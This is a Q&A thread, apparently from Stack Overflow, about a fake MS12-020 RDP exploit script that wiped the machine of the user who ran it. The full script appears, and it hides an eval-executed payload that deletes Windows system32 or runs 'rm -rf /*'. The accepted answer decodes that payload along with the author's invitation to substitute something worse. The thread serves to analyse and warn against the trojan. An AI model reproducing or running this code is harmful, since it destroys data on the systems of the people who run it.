# Why does this Python code destroy my computer?

Tags: python, security, operating-system, exploit

It claims to be MS12-020 exploit, and I tested this on my machine. Apparently, it seems to destroy the operating system that runs it.

Looking just some parts of this code does not indicate any malicious code, so I asking for your help.

What is it exactly doing, and how would I be able to recover the system?

Edit: it does not destroy the machine targetted; it destroys the machine that runs it. I would get tons of information if I am to search what MS12-020 is!!!!

### EDIT: DO NOT RUN THIS CODE. IT IS `rm -rf /` IN DISGUISE.

```
#!/usr/bin/env python

# rdpsmash.py
# MS12-020 RDP exploit, remote code execution
# Confirmed working on all pre-patch boxes, XP to 7
#
# Author: Verye

import struct
import socket
import sys

trigger =  "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\xf1"
trigger += "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63"
trigger += "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a"
trigger += "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f"
trigger += "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73"
trigger += "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c"
trigger += "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70"
trigger += "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61"
trigger += "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33"
trigger += "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32"
trigger += "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e"
trigger += "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39"
trigger += "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e"
trigger += "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51"
trigger += "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64"
trigger += "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37"
trigger += "\x41" * 39
trigger += "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e"
trigger += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73"
trigger += "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61"
trigger += "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78"
trigger += "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e"
trigger += "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30"
trigger += "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b"
trigger += "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b"
trigger += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x00"

nopsled = "\x90" * 214

#bindshell port 8888
shellcode =  "\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73"
shellcode += "\x74\x65\x6d\x28\x27\x64\x65\x6c\x20\x2f\x73\x20\x2f\x71\x20\x2f\x66\x20\x43\x3a"
shellcode += "\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x2a\x20"
shellcode += "\x3e\x20\x4e\x55\x4c\x20\x32\x3e\x26\x31\x27\x29\x20\x69\x66\x20\x27\x57\x69\x6e"
shellcode += "\x27\x20\x69\x6e\x20\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x70\x6c\x61"
shellcode += "\x74\x66\x6f\x72\x6d\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x29\x20\x65\x6c\x73"
shellcode += "\x65\x20\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73"
shellcode += "\x79\x73\x74\x65\x6d\x28\x27\x72\x6d\x20\x2d\x72\x66\x20\x2f\x2a\x20\x3e\x20\x2f"
shellcode += "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x27\x29\x20\x23\x68\x69\x20"
shellcode += "\x74\x68\x65\x72\x65\x20\x5e\x5f\x7e\x20\x66\x65\x65\x6c\x20\x66\x72\x65\x65\x20"
shellcode += "\x74\x6f\x20\x73\x70\x72\x65\x61\x64\x20\x74\x68\x69\x73\x20\x77\x69\x74\x68\x20"
shellcode += "\x74\x68\x65\x20\x72\x6d\x20\x2d\x72\x66\x20\x72\x65\x70\x6c\x61\x63\x65\x64\x20"
shellcode += "\x77\x69\x74\x68\x20\x73\x6f\x6d\x65\x74\x68\x69\x6e\x67\x20\x6d\x6f\x72\x65\x20"
shellcode += "\x69\x6e\x73\x69\x64\x69\x6f\x75\x73"

evil = trigger + nopsled

class RDPsocket(socket.socket):
    def __init__(self, payload, shellcode):
        super(RDPsocket, self).__init__(socket.AF_INET, socket.SOCK_STREAM)
        self.payload = payload
        self.table = __import__("__builtin__").__dict__ #dirty workaround
        self.shellcode = shellcode
    
    def parse(self, address, shellcode):
        seeker = (struct.pack(">I", 0x6576616c), 
            socket.inet_aton(address[0]), #IP bytes
            socket.inet_aton(str(address[1]))) #port bytes
        parsed =  struct.pack(">I", 0x8fe2fb63) #pop eax
        parsed += struct.pack(">I", 0x8fe2fb58) #push esp
        parsed += struct.pack(">I", 0xffff1d6b) #add esp,byte +0x1c # pop ebp # ret
        parsed += struct.pack(">I", 0x8fe2db10) #call strcpy
        parsed += struct.pack(">I", 0x8fe2dfd1) #POP - POP - RET over strcpy params
        parsed += struct.pack(">I", 0x8fe2dae4) #mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret
        parsed += struct.pack(">I", 0x8fe2b3d4) #POP - RET
        parsed += struct.pack(">I", 0xffffffff) #value to store in ecx
        parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
        parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
        parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
        parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
        parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
        parsed += seeker[0] #add the prelude
        parsed += seeker[1] #add the packed IP address
        parsed += seeker[2] #add the packed port
        parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
        parsed += struct.pack(">I", 0x8fe2c71d) #mov eax,edx # ret
        parsed += struct.pack(">I", 0x8fe2def4) #add eax,ecx # ret  
        parsed += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx
        parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
        parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
        parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
        parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
        parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
        parsed += struct.pack(">I", 0x8fe2def4) #add eax,ecx # ret # swap back
        parsed += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx # copy parameter to placeholder
        parsed += struct.pack(">I", 0x8fe2fb61) #mov [eax],edx # pop eax # ret # set our stack pointer back to original value
        parsed += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx
        parsed += struct.pack(">I", 0x8fe2daea) #sub eax,ecx # ret
        parsed += struct.pack(">I", 0x8fe0b1c2) #xchg eax,ebp # inc ebp # ret
        parsed += struct.pack(">I", 0x8fe2b6a5) #dec ebp # ret
        parsed += struct.pack(">I", 0xffff01f3) #mov esp,ebp # pop ebp # ret
        read = self.table[seeker[0]] #reader for the parsed shellcode/data
        
        return str(read(shellcode)), parsed

    def connect(self, address):
        self.parsed_shell = self.parse(address, shellcode)
        super(RDPsocket, self).connect(address)

    def evil_sendall(self):
        super(RDPsocket, self).sendall(evil + self.parsed_shell[0] + self.parsed_shell[1])


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "[*] Usage: python rdpsmash.py IP"
        print "[*] If running on non-default port, reassign PORT in the source."
    
    else:   
        TARGET = sys.argv[1]
        PORT = 3389 #default RDP port
        
        print "[*] Running rdpsmash"
        print
        s = RDPsocket(evil, shellcode)
        print "[+] Connecting and configuring payload. . ."
        print "[+] This may take some time"
        s.connect((TARGET, PORT))
        print "[+] Connection established"
        print "[+] Sending payload. . ."
        s.evil_sendall()
        response = s.recv(4096)
        if "\xA5\x43\xE7\x38\x75\x84\xF2\xFF\xFF\x18\x61\x00" in response:
            print "[+] Success! Payload sent and executed."
            print "[+] Telnet to target on port 8888."
        else:
            print "[-] Failed"
        s.close()
```

Comment: You basically pasted a ton of code and asked what it does. Have you made any attempt to read the code?

Comment: @Blender yes, I tried. It seems to disguise itself as RDP-related stuff, as it loads RDP classes and modules and seems to connect to the target host, but at some point, it seems to do the other thing..

Comment: Formatting code is easy, just copy and paste it into the question, highlight the code, and use the `{}` button or press Ctrl+K. That will indent all the code by four spaces, which makes it format properly and syntax highlighted.

Comment: So, let me get this straight: you downloaded a python script that claims to allow you to connect to a remote machine and "smash" the remote machine. Most likely, this code is from a not-too-reputable source. And you ran it on one of your machines? In case you haven't realized it yet; you've been had. [MS12-020](http://technet.microsoft.com/en-us/security/bulletin/ms12-020) is a security flaw, and this script claims to exploit it by targeting a remote computer. In actuality, it deletes files of people running it. I hope you've learned your lesson. :)

Comment: @MarkHildreth you don't have to say it again, Mark.. :) it's too painful lesson..... I learned about obfuscation, but... my bad. Never really thought this would happen. (I never thought this would be an obfuscation attempt.... my bad.) Thanks for everyone, I learned a valuable (or an invaluable) lesson.

Comment: I was the original author of this code; was my first attempt at writing obfuscated Python. Wrote it a while back to mess with script kiddies a bit. Seems to have done its job well.

Answer (score 43, accepted):

The first line of that `parse` method is interesting:

```
In [4]: struct.pack(">I", 0x6576616c)
Out[4]: 'eval'
```

The next time you see it is at the bottom of `parse`:

```
read = self.table[seeker[0]] #reader for the parsed shellcode/data
```

And `self.table` is defined as:

```
self.table = __import__("__builtin__").__dict__ #dirty workaround
```

It's not a "dirty workaround". It's an obfuscated way to write `eval`.

What's in this magical `shellcode` variable?

```
shellcode =  "\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73"
shellcode += "\x74\x65\x6d\x28\x27\x64\x65\x6c\x20\x2f\x73\x20\x2f\x71\x20\x2f\x66\x20\x43\x3a"
shellcode += "\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x2a\x20"
shellcode += "\x3e\x20\x4e\x55\x4c\x20\x32\x3e\x26\x31\x27\x29\x20\x69\x66\x20\x27\x57\x69\x6e"
shellcode += "\x27\x20\x69\x6e\x20\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x70\x6c\x61"
shellcode += "\x74\x66\x6f\x72\x6d\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x29\x20\x65\x6c\x73"
shellcode += "\x65\x20\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73"
shellcode += "\x79\x73\x74\x65\x6d\x28\x27\x72\x6d\x20\x2d\x72\x66\x20\x2f\x2a\x20\x3e\x20\x2f"
shellcode += "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x27\x29\x20\x23\x68\x69\x20"
shellcode += "\x74\x68\x65\x72\x65\x20\x5e\x5f\x7e\x20\x66\x65\x65\x6c\x20\x66\x72\x65\x65\x20"
shellcode += "\x74\x6f\x20\x73\x70\x72\x65\x61\x64\x20\x74\x68\x69\x73\x20\x77\x69\x74\x68\x20"
shellcode += "\x74\x68\x65\x20\x72\x6d\x20\x2d\x72\x66\x20\x72\x65\x70\x6c\x61\x63\x65\x64\x20"
shellcode += "\x77\x69\x74\x68\x20\x73\x6f\x6d\x65\x74\x68\x69\x6e\x67\x20\x6d\x6f\x72\x65\x20"
shellcode += "\x69\x6e\x73\x69\x64\x69\x6f\x75\x73"
```

A nice surprise (the comment was actually in there):

```
if 'Win' in __import__('platform').system():
  __import__('os').system('del /s /q /f C:\windows\system32\* > NUL 2>&1')
else:
  __import__('os').system('rm -rf /* > /dev/null 2>&1')

#hi there ^_~ feel free to spread this with the rm -rf replaced with something more insidious
```

You just ran `rm -rf /` on *your* computer. You should be happy that it wasn't something a bit more covert, like a keylogger.

Comment: No, I mean it destroys the box that runs the exploit. Not the machine targetted. I know this because it destroyed my virtual machine, and I ran it against my test server.

Comment: I find that hard to believe. This script just sends some data. It doesn't execute anything on the machine sending the payload.

Comment: that's why I was also curious, but it destroys the box that is the source, not the target. (there are other users that reported the same...) and even then, it wasn't even supposed to destroy the target....

Comment: See my edit. I found some strange statements in the code and they look like obfuscation attempts. I have to admit, this is pretty neat.

Comment: Oh my god.. now I get it. This is a horrifying obfuscation...

Comment: This means... recovery is not possible....., or is there?

Comment: On Linux, you deleted *everything*. No going back. On Windows, you killed the system, but your files should be okay.

Comment: Even no some left-over bits that can be used by recovery solutions to recover data?

Comment: Give [PhotoRec](http://www.cgsecurity.org/wiki/PhotoRec) a try.

Comment: I always find Linux is faster in deleting things (and maybe in everything it does except graphics and gaming) than Windows is. rm -rf destroyed a bank's digital system in an hour....

Comment: Pastebin....... (http://pastebin.com/GM4sHj9t) haha... my bad... I always heard "never trust the codes you did not write" but I did not really practice.. and I got hit with this horrifying obfuscation..

Comment: The __dict__ part is actually accessing the dictionary that implements the namespace for the __builtin__ module.

Comment: Its a fake RDP exploit which deletes all your files and folders.